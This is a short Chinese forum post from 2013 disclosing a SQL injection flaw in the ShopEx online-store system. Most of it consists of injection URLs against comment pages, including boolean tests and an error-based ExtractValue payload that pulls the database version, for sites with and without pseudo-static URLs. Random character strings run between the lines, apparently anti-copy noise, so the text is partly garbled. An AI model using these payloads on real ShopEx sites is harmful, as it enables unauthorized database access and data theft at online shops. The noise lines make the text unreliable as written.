注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
- r0 W# C. w1 U0 l9 Q, Q3 T. `6 t' x4 ]0 y7 w# k
好吧,我扯远了~~
. b6 b3 i- s! |' K. G. c5 a其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~' |/ `! f( u X& n9 [7 R
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: + x! A, N @# n# t2 ?
5 ~$ q& D$ E) r2 d$ h8 J
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
K3 B$ p- P8 M' h) e) o. F; _( X+ ^& c1 O9 G
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
2 v5 F4 N I# F+ Z; ^5 D8 ?2 a5 ^% u7 S# e8 f) \
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' K* g9 J% b( [! N) m$ k5 ?+ b' _, w" s: v$ a8 V/ d
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 2 M# ^$ s3 u0 c' [7 ] f) S7 d7 H
( i5 u- M- H% J6 S: Q# x9 y # I+ U f. d: ^
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
& G. A4 z+ O1 U C+ \3 c0 @; ~如何注入就不多说了,10多年的东西了…不会也会了…
, }" s8 s0 S! C2 w9 q0 |, S# [8 v$ _- }. y0 Z- g. f
7 U2 u V- H$ J Y+ ]5 x$ c
; d" T. g% d8 d7 `
8 S: Q1 k: P7 M7 S' O0 c) c7 p |
发表于 2013-2-19 08:31:27
收藏
支持
反对